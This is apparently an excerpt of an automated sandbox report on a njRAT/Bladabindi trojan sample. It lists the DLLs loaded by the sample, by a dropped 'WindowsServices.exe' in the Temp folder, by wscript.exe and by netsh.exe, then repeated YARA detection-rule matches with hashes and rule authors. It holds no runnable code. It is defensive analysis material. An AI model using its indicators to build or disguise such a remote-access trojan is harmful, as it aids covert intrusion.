Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: 3_2_00E60CD8	3_2_00E60CD8
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: 3_2_00E60CBE	3_2_00E60CBE

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: String function: 00404850 appears 69 times
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: String function: 00404670 appears 69 times
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: String function: 00403E10 appears 116 times
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: String function: 004039C0 appears 116 times

Source: nOZ2Oqnzbz.exe, 00000000.00000002.1624361982.0000000002160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFlowerPower.EXE vs nOZ2Oqnzbz.exe
Source: nOZ2Oqnzbz.exe, 00000000.00000002.1624289078.000000000066B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecaspol.exeT vs nOZ2Oqnzbz.exe
Source: nOZ2Oqnzbz.exe, 00000000.00000000.1613067115.0000000000441000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFlowerPower.EXE vs nOZ2Oqnzbz.exe
Source: nOZ2Oqnzbz.exe, 00000003.00000002.1700190097.0000000003C16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFlowerPower.EXE vs nOZ2Oqnzbz.exe
Source: nOZ2Oqnzbz.exe, 00000003.00000000.1622574378.0000000000441000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFlowerPower.EXE vs nOZ2Oqnzbz.exe
Source: nOZ2Oqnzbz.exe	Binary or memory string: OriginalFilenameFlowerPower.EXE vs nOZ2Oqnzbz.exe
Source: nOZ2Oqnzbz.exe.0.dr	Binary or memory string: OriginalFilenamecaspol.exeT vs nOZ2Oqnzbz.exe

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: mfc42.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section loaded: cryptbase.dll

Source: nOZ2Oqnzbz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
